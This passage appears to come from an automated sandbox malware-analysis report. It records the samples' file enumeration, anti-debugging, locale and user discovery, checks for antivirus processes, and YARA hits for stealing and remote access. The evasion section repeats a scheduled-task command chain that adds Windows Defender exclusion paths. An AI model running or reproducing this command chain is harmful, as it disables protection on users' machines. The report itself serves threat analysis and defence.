                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040E965
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_004469AF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA,49_2_004D2C75
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_004472CA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError,49_2_004A73D0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00427512 __EH_prolog,FindFirstFileA,FindClose,49_2_00427512
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100126FA FindFirstFileExW,49_2_100126FA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00425624 __EH_prolog,GetLogicalDriveStringsA,49_2_00425624
                Source: C:\Users\user\Documents\l0tiFM.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: d0oKoK2T.exe, 00000034.00000002.3350448703.000001E8AC620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: lBoqoqIC.exe, 00000031.00000002.3351643795.0000000003174000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351643795.0000000003174000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, d0oKoK2T.exe, 00000034.00000002.3350448703.000001E8AC620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Documents\l0tiFM.exeAPI call chain: ExitProcess graph end nodegraph_6-14032
                Source: C:\Users\user\Documents\l0tiFM.exeAPI call chain: ExitProcess graph end nodegraph_6-14374
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI call chain: ExitProcess graph end nodegraph_49-119727
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI call chain: ExitProcess graph end nodegraph_49-119722
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400073E0 LdrLoadDll,6_2_00000001400073E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_0042A98F mov eax, dword ptr fs:[00000030h]48_2_0042A98F
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004269BF mov eax, dword ptr fs:[00000030h]48_2_004269BF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100122C7 mov eax, dword ptr fs:[00000030h]49_2_100122C7
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000ED93 mov eax, dword ptr fs:[00000030h]49_2_1000ED93
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,6_2_0000000140004630
                Source: C:\Users\user\Documents\l0tiFM.exeProcess token adjusted: DebugJump to behavior
                Source: C:\ProgramData\53jGFr5v.exeProcess token adjusted: Debug
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC32076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC32076E0
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC3201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC3201F50
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC3202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC3202630
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_008410CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_008410CC
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_00842AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00842AE2
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeCode function: 44_2_008451FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_008451FB
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B6DA7 SetUnhandledExceptionFilter,49_2_004B6DA7
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004B6DB9 SetUnhandledExceptionFilter,49_2_004B6DB9
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000916B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_1000916B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000916C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_1000916C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000963F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_1000963F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_1000E47A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_1000E47A

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Documents\l0tiFM.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeNtProtectVirtualMemory: Indirect: 0x2A4B253Jump to behavior
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeNtDelayExecution: Indirect: 0x1B94DAJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeNtProtectVirtualMemory: Indirect: 0x2AAB253Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Program Files (x86)\DfP1K3\DfP1K3.exe "C:\Program Files (x86)\DfP1K3\DfP1K3.exe" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\Users\user\Documents\l0tiFM.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: 49_2_0041E7C9 GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,GetLastError,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,49_2_0041E7C9
                Source: d0oKoK2T.exe, 00000034.00000002.3349497477.000000B1FF8FF000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: lBoqoqIC.exe, lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Shell_TrayWnd
                Source: lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: N.?AVCMenu@@TrayClockWClassTrayNotifyWndShell_TrayWnd|
                Source: d0oKoK2T.exe, 00000034.00000002.3349497477.000000B1FF8FF000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: )Program Manager
                Source: C:\Users\user\Documents\l0tiFM.exe Code function: 6_2_00007FFBC320FD40 cpuid 6_2_00007FFBC320FD40
                Source: C:\Users\user\Documents\l0tiFM.exe Code function: GetLocaleInfoA,6_2_000000014000F370
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe Code function: GetLocaleInfoA,44_2_00846B1A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,49_2_004BE0FA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,49_2_004C2085
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: __EH_prolog,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,49_2_004020A1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoA,MultiByteToWideChar,49_2_004C2142
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,49_2_004C2198
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoW,WideCharToMultiByte,49_2_004C225B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: EnumSystemLocalesA,49_2_004BE2CF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: EnumSystemLocalesA,49_2_004BE55A
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: EnumSystemLocalesA,49_2_004BE66D
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: GetLocaleInfoA,49_2_004BE861
                Source: C:\Users\user\Documents\l0tiFM.exe Code function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000014000A370
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: 49_2_00405A7F GetUserNameA,49_2_00405A7F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe Code function: 49_2_004B967E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,49_2_004B967E
                Source: C:\Users\user\Documents\l0tiFM.exe Code function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_0000000140005A70
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: kxetray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: vsserv.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: avcenter.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: KSafeTray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: avp.exe
                Source: DfP1K3.exe, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: 360safe.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SuperKiller.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, 53jGFr5v.exe, 00000030.00000002.3348989985.000000000255F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: msmpeng.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: Autoruns.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: 360Safe.exe
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: mcshield.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: 360tray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: rtvscan.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: ashDisp.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: 360Tray.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: avgwdsvc.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AYAgent.aye
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: RavMonD.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Mcshield.exe
                Source: l0tiFM.exe, 00000006.00000002.2105065881.0000000002818000.00000002.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe

                Stealing of Sensitive Information

                Source: Yara match File source: 42.2.DfP1K3.exe.3a503e8.7.unpack, type: UNPACKEDPE
                Source: Yara match File source: 42.2.DfP1K3.exe.3a503e8.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 42.2.DfP1K3.exe.10000000.8.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match File source: 42.2.DfP1K3.exe.3a503e8.7.unpack, type: UNPACKEDPE
                Source: Yara match File source: 42.2.DfP1K3.exe.3a503e8.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 42.2.DfP1K3.exe.10000000.8.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: DfP1K3.exe PID: 7124, type: MEMORYSTR
